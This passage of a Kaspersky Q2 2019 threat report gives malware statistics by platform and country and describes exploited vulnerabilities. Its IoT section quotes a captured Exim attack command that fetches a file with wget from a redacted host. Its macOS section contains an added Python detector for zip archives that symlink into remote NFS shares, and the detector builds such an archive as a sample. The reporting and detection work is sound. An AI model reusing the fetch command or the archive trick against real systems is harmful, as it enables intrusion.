Threats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.

In Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the Asacub family. The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware.

Verdict  %*
1   DangerousObject.Multi.Generic        44.37
2   Trojan.AndroidOS.Boogr.gsh           11.31
3   DangerousObject.AndroidOS.GenericML   5.66
4   Trojan.AndroidOS.Hiddapp.cr           4.77
5   Trojan.AndroidOS.Hiddapp.ch           4.17
6   Trojan.AndroidOS.Hiddapp.cf           2.81
7   Trojan.AndroidOS.Hiddad.em            2.53
8   Trojan-Dropper.AndroidOS.Lezok.p      2.16
9   Trojan-Dropper.AndroidOS.Hqwar.bb     2.08
10  Trojan-Banker.AndroidOS.Asacub.a      1.93
11  Trojan-Banker.AndroidOS.Asacub.snt    1.92
12  Trojan-Banker.AndroidOS.Svpeng.ak     1.91
13  Trojan.AndroidOS.Hiddapp.cg           1.89
14  Trojan.AndroidOS.Dvmap.a              1.88
15  Trojan-Dropper.AndroidOS.Hqwar.gen    1.86
16  Trojan.AndroidOS.Agent.rt             1.81
17  Trojan-SMS.AndroidOS.Prizmes.a        1.58
18  Trojan.AndroidOS.Fakeapp.bt           1.58
19  Trojan.AndroidOS.Agent.eb             1.49
20  Exploit.AndroidOS.Lotoor.be           1.46

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked.

As per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.37%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

Fourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.

Eighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.

Ninth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking Trojans.

Tenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.

Geography of mobile threats


Geography of mobile malware infection attempts, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile malware

Country*  %**
1   Iran        28.31
2   Bangladesh  28.10
3   Algeria     24.77
4   Pakistan    24.00
5   Tanzania    23.07
6   Nigeria     22.69
7   India       21.65
8   Indonesia   18.13
9   Sri Lanka   15.96
10  Kenya       15.38

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile malware as a percentage of all users of Kaspersky mobile solutions in the country.

At the head of Q2’s Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.

Most often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).

Like Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware apps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).

Third place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.

Mobile banking Trojans

In the reporting period, we detected 13,899 installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.

The largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.


Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 – Q2 2019 (download)

Top 10 mobile banking Trojans

Verdict  %*
1   Trojan-Banker.AndroidOS.Asacub.a     13.64
2   Trojan-Banker.AndroidOS.Asacub.snt   13.61
3   Trojan-Banker.AndroidOS.Svpeng.ak    13.51
4   Trojan-Banker.AndroidOS.Svpeng.q      9.90
5   Trojan-Banker.AndroidOS.Agent.ep      9.37
6   Trojan-Banker.AndroidOS.Asacub.ce     7.75
7   Trojan-Banker.AndroidOS.Faketoken.q   4.18
8   Trojan-Banker.AndroidOS.Asacub.cs     4.18
9   Trojan-Banker.AndroidOS.Agent.eq      3.81
10  Trojan-Banker.AndroidOS.Faketoken.z   3.13

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats.

Almost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family’s distribution bursts that we registered last quarter were not repeated this time.

As in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, one of the longest-lived mobile banking families in existence.


Geography of mobile banking threats, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans

Country*  %**
1   South Africa  0.64
2   Russia        0.31
3   Tajikistan    0.21
4   Australia     0.17
5   Turkey        0.17
6   Ukraine       0.13
7   Uzbekistan    0.11
8   Korea         0.11
9   Armenia       0.10
10  India         0.10

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

In Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.

Second place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).

Third place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan-Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.

Mobile ransomware Trojans

In Q2 2019, we detected 23,294 installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.


Number of installation packages for mobile ransomware Trojans, Q3 2018 – Q2 2019 (download)

Top 10 mobile ransomware Trojans

Verdict  %*
1   Trojan-Ransom.AndroidOS.Svpeng.aj   43.90
2   Trojan-Ransom.AndroidOS.Rkor.i      11.26
3   Trojan-Ransom.AndroidOS.Rkor.h       7.81
4   Trojan-Ransom.AndroidOS.Small.as     6.41
5   Trojan-Ransom.AndroidOS.Svpeng.ah    5.92
6   Trojan-Ransom.AndroidOS.Svpeng.ai    3.35
7   Trojan-Ransom.AndroidOS.Fusob.h      2.48
8   Trojan-Ransom.AndroidOS.Small.o      2.46
9   Trojan-Ransom.AndroidOS.Pigetrl.a    2.45
10  Trojan-Ransom.AndroidOS.Small.ce     2.22

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.

In Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.


Geography of mobile ransomware Trojans, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans

Country*  %**
1   US            1.58
2   Kazakhstan    0.39
3   Iran          0.27
4   Pakistan      0.16
5   Saudi Arabia  0.10
6   Mexico        0.09
7   Canada        0.07
8   Italy         0.07
9   Singapore     0.05
10  Indonesia     0.05

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)
** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

The leaders by share of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%).

Attacks on Apple macOS

Q2 witnessed several interesting events, three of which deserve special attention.

A vulnerability was discovered in macOS that allows Gatekeeper and XProtect checks to be bypassed. To exploit it, the attacker packs into an archive a symbolic link that points at a folder on an NFS share under their control. When the victim opens the archive, the system automatically mounts the share and the files in that folder are fetched and opened without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens looked more like test versions than actual malware.
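As an added illustration of the archive shape this bypass depends on (example code written for this page, not Kaspersky's code and not taken from the original report), the following Python check inspects a zip archive for symlink entries whose target lies under the macOS NFS automounter tree. It assumes the automount roots /net/ and /Network/ (the /net/<host>/<export> form is an assumption about how the share was referenced) and uses a TEST-NET address; the sample archive is constructed inside the block.

```python
import io
import stat
import zipfile

# Automounter roots under which macOS mounts remote NFS exports.
# Assumption: the bypass referenced the share as /net/<host>/<export>.
AUTOMOUNT_PREFIXES = ("/net/", "/Network/")


def build_sample_zip(link_target="/net/203.0.113.10/share"):
    """Construct a sample archive: one harmless file plus a symlink entry
    whose target is the given path. Constructed for this example, not a
    real-world sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "hello")
        info = zipfile.ZipInfo("Tools")
        info.create_system = 3                             # Unix-style attributes
        info.external_attr = (stat.S_IFLNK | 0o755) << 16  # entry is a symlink
        zf.writestr(info, link_target)                     # link target is the entry body
    return buf.getvalue()


def find_symlink_entries(zip_bytes):
    """Return (entry name, link target, suspicious) for every symlink entry.
    A symlink is flagged when its target points into an automounted remote
    share, i.e. content that is not actually inside the archive."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16  # upper 16 bits hold the Unix mode
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", "replace")
            suspicious = target.startswith(AUTOMOUNT_PREFIXES) or target.startswith("nfs://")
            found.append((info.filename, target, suspicious))
    return found


def is_suspicious_archive(zip_bytes):
    """True if any symlink in the archive points at an automounted remote share."""
    return any(flag for _, _, flag in find_symlink_entries(zip_bytes))


if __name__ == "__main__":
    for name, target, flag in find_symlink_entries(build_sample_zip()):
        print(f"{name} -> {target}  {'SUSPICIOUS' if flag else 'ok'}")
```

The check reads the link target from the entry body rather than trusting the file name, because the name in the archive is whatever the attacker chose; a symlink that resolves to a local relative path is reported but not flagged.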

Vulnerabilities detected in the Firefox browser (CVE-2019-11707, which allows arbitrary code execution inside the browser, and CVE-2019-11708, which allows an escape from the browser sandbox) could be chained to run code outside the sandbox. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.

Also an interesting vector for delivering a malicious miner to victims was discovered. The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish – both QEMU and the miner consume significant resources – that such a Trojan could not remain unnoticed for long.

Top 20 threats for macOS

Verdict  %*
1   Trojan-Downloader.OSX.Shlayer.a  24.61
2   AdWare.OSX.Spc.a                 12.75
3   AdWare.OSX.Bnodlero.t            11.98
4   AdWare.OSX.Pirrit.j              11.27
5   AdWare.OSX.Pirrit.p               8.42
6   AdWare.OSX.Pirrit.s               7.76
7   AdWare.OSX.Pirrit.o               7.59
8   AdWare.OSX.MacSearch.a            5.92
9   AdWare.OSX.Cimpli.d               5.76
10  AdWare.OSX.Mcp.a                  5.39
11  AdWare.OSX.Agent.b                5.11
12  AdWare.OSX.Pirrit.q               4.31
13  AdWare.OSX.Bnodlero.v             4.02
14  AdWare.OSX.Bnodlero.q             3.70
15  AdWare.OSX.MacSearch.d            3.66
16  Downloader.OSX.InstallCore.ab     3.58
17  AdWare.OSX.Geonei.as              3.48
18  AdWare.OSX.Amc.a                  3.29
19  AdWare.OSX.Agent.c                2.93
20  AdWare.OSX.Mhp.a                  2.90

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

On the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.

Threat geography

Country*  %**
1   France  11.11
2   Spain    9.68
3   India    8.84
4   US       8.49
5   Canada   8.35
6   Russia   8.01
7   Italy    7.74
8   UK       7.47
9   Mexico   7.08
10  Brazil   6.85

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.

In the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.

IoT attacks

Interesting events

In the world of Linux/Unix threats, the most significant event was the sharp rise in the number of attacks exploiting a new vulnerability in the Exim mail transfer agent. In a nutshell, the attacker crafts an email whose recipient address contains shell commands and sends it through the vulnerable server. When Exim processes delivery of that message, it expands the recipient address and executes the embedded commands on the server itself.

Intercepted attack traffic

The screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows:

/bin/bash -c "wget X.X.X.X/exm -O /dev/null

IoT threat statistics

Q2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. Our assumption is that cybercriminals are gradually shifting to more capable devices, which support SSH.

SSH 40.43% Telnet 59.57%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019

However, in terms of number of sessions involving Kaspersky Lab honeypots, we see a decline for SSH from 64% in Q1 to 49.6% in Q2.

SSH 49.59% Telnet 50.41%

Distribution of cybercriminals’ working sessions with Kaspersky Lab traps, Q2 2019

Telnet-based attacks


Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019 (download)

Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps

Country  %
1   Egypt   15.06
2   China   12.27
3   Brazil  10.24
4   US       5.23
5   Russia   5.03
6   Greece   4.54
7   Iran     4.06
8   Taiwan   3.15
9   India    3.04
10  Turkey   2.90

For the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.

Telnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.

Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks

Verdict  %*
1   Backdoor.Linux.Mirai.b             38.92
2   Trojan-Downloader.Linux.NyaDrop.b  26.48
3   Backdoor.Linux.Mirai.ba            26.48
4   Backdoor.Linux.Mirai.au            15.75
5   Backdoor.Linux.Gafgyt.bj            2.70
6   Backdoor.Linux.Mirai.ad             2.57
7   Backdoor.Linux.Gafgyt.az            2.45
8   Backdoor.Linux.Mirai.h              1.38
9   Backdoor.Linux.Mirai.c              1.36
10  Backdoor.Linux.Gafgyt.av            1.26

* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks

As things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.

SSH-based attacks


Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019 (download)

Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps

Country  %
1   Vietnam     15.85
2   China       14.51
3   Egypt       12.17
4   Brazil       6.91
5   Russia       6.66
6   US           5.05
7   Thailand     3.76
8   Azerbaijan   3.62
9   India        2.43
10  France       2.12

In Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.

Financial threats

Financial threat statistics

In Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.

Number of unique users attacked by financial malware, Q2 2019

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks, Q2 2019

Top 10 countries by share of attacked users

      Country*        %**
  1   Belarus         2.0
  2   Venezuela       1.8
  3   China           1.6
  4   Indonesia       1.3
  5   South Korea     1.3
  6   Cyprus          1.2
  7   Paraguay        1.2
  8   Russia          1.2
  9   Cameroon        1.1
 10   Serbia          1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families

      Name        Verdict                        %*
  1   RTM         Trojan-Banker.Win32.RTM        32.2
  2   Zbot        Trojan.Win32.Zbot              23.3
  3   Emotet      Backdoor.Win32.Emotet           8.2
  4   Nimnul      Virus.Win32.Nimnul              6.4
  5   Trickster   Trojan.Win32.Trickster          5.0
  6   Nymaim      Trojan.Win32.Nymaim             3.5
  7   SpyEye      Backdoor.Win32.SpyEye           3.2
  8   Neurevt     Trojan.Win32.Neurevt            2.8
  9   IcedID      Trojan-Banker.Win32.IcedID      1.2
 10   Gozi        Trojan.Win32.Gozi               1.1

* Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.

We also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.

Ransomware programs

Quarterly highlights

After almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was shutting down the operation. According to our reports, it was one of the most common ransomware encryptors.

In Q2, distribution got underway of the new Sodin ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.

Also this quarter, there were a few high-profile ransomware infections in the computer networks of city administrations. This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.

Number of new modifications

In Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.

Number of new ransomware modifications, Q2 2018 – Q2 2019

The majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware – it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim’s data inside them in encrypted form.

Number of users attacked by ransomware Trojans

In Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.

Number of unique users attacked by ransomware Trojans, Q2 2019

The busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.

Attack geography

Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019

Top 10 countries attacked by ransomware Trojans

      Country*        % of users attacked by ransomware**
  1   Bangladesh      8.81%
  2   Uzbekistan      5.52%
  3   Mozambique      4.15%
  4   Ethiopia        2.42%
  5   Nepal           2.26%
  6   Afghanistan     1.50%
  7   China           1.18%
  8   Ghana           1.17%
  9   Korea           1.07%
 10   Kazakhstan      1.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans

      Name                 Verdict*                           Percentage of attacked users**
  1   WannaCry             Trojan-Ransom.Win32.Wanna          23.37%
  2   (generic verdict)    Trojan-Ransom.Win32.Phny           18.73%
  3   GandCrab             Trojan-Ransom.Win32.GandCrypt      13.83%
  4   (generic verdict)    Trojan-Ransom.Win32.Gen             7.41%
  5   (generic verdict)    Trojan-Ransom.Win32.Crypmod         4.73%
  6   (generic verdict)    Trojan-Ransom.Win32.Encoder         4.15%
  7   Shade                Trojan-Ransom.Win32.Shade           2.75%
  8   PolyRansom/VirLock   Virus.Win32.PolyRansom,
                           Trojan-Ransom.Win32.PolyRansom      2.45%
  9   Crysis/Dharma        Trojan-Ransom.Win32.Crusis          1.31%
 10   Cryakl               Trojan-Ransom.Win32.Cryakl          1.24%

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data.
** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners

Number of new modifications

In Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.

Number of new miner modifications, Q2 2019

The largest number of new modifications was detected in April (3,101), nearly 1,000 more than in March 2019; on average, however, fewer and fewer new miner modifications are appearing.

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.

Number of unique users attacked by miners, Q2 2019

Throughout the quarter, the number of attacked users gradually decreased – from 383,000 in April to 318,000 in June.

Attack geography

Geographical spread of countries by share of users attacked by miners, Q2 2019

Top 10 countries by share of users attacked by miners

      Country*        % of users attacked by miners**
  1   Afghanistan     10.77%
  2   Ethiopia         8.99%
  3   Uzbekistan       6.83%
  4   Kazakhstan       4.76%
  5   Tanzania         4.66%
  6   Vietnam          4.28%
  7   Mozambique       3.97%
  8   Ukraine          3.08%
  9   Belarus          3.06%
 10   Mongolia         3.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyber attacks

Over the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception: the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The growth was driven primarily by incessant mass spam mailings distributing documents with exploits for the CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802 vulnerabilities. These are stack overflow vulnerabilities caused by bugs in object processing in the Equation Editor component of Microsoft Office, and they allow remote code execution. Other Office vulnerabilities such as CVE-2017-8570 and CVE-2017-8759 are also popular with cybercriminals.

The increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019

The share of detected exploits for vulnerabilities in web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities result from errors in just-in-time code compilation and in the various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for modification of data or data types during such processing, where the compiler/optimizer does not expect it, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type (integer) overflows, use of freed memory (use-after-free), and incorrect use of types (type confusion). Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of Coinbase and a number of other organizations. Found in the wild, it chained two vulnerabilities, CVE-2019-11707 and CVE-2019-11708, for remote code execution in Mozilla Firefox.

On the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: CVE-2019-1069, CVE-2019-0863, CVE-2019-0841, and CVE-2019-0973.

The share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities in network applications such as Oracle WebLogic on stream. A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the CVE-2019-0708 vulnerability, found in Q2, in the remote desktop subsystem of Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers and to build a network worm not unlike the WannaCry ransomware. Insufficient validation of incoming packets allows an attacker to trigger a use-after-free and overwrite data in kernel memory. Note that exploitation does not require a valid remote account, as it takes place at the authentication stage, before the username and password are checked.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2019, Kaspersky solutions defeated 717,057,912 attacks launched from online resources located in 203 countries across the globe. 217,843,293 unique URLs triggered Web Anti-Virus components.

Distribution of web-based attack sources by country, Q2 2019

This quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

      Country*        % of attacked users**
  1   Algeria         20.38
  2   Venezuela       19.13
  3   Albania         18.30
  4   Greece          17.36
  5   Moldova         17.30
  6   Bangladesh      16.82
  7   Estonia         16.68
  8   Azerbaijan      16.59
  9   Belarus         16.46
 10   Ukraine         16.18
 11   France          15.84
 12   Philippines     15.46
 13   Armenia         15.40
 14   Tunisia         15.29
 15   Bulgaria        14.73
 16   Poland          14.69
 17   Réunion         14.68
 18   Latvia          14.65
 19   Peru            14.50
 20   Qatar           14.32

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.

Geography of malicious web-based attacks, Q2 2019

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2019, our File Anti-Virus detected 240,754,063 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

      Country*         % of attacked users**
  1   Afghanistan      55.43
  2   Tajikistan       55.27
  3   Uzbekistan       55.03
  4   Yemen            52.12
  5   Turkmenistan     50.75
  6   Laos             46.12
  7   Syria            46.00
  8   Myanmar          45.61
  9   Mongolia         45.59
 10   Ethiopia         44.95
 11   Bangladesh       44.11
 12   Iraq             43.79
 13   China            43.60
 14   Bolivia          43.47
 15   Vietnam          43.22
 16   Venezuela        42.71
 17   Algeria          42.33
 18   Cuba             42.31
 19   Mozambique       42.14
 20   Rwanda           42.02

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives.

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local threats, Q2 2019

Overall, 22.35% of user computers globally faced at least one Malware-class local threat during Q2.

The figure for Russia was 26.14%.

Recent Cloud Atlas activity

12 August, 2019 - 12:00

Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.

From the beginning of 2019 until July, we identified several spear-phishing campaigns related to this threat actor, mostly focused on Russia, Central Asia and the regions of Ukraine with ongoing military conflicts.

Countries targeted by Cloud Atlas recently

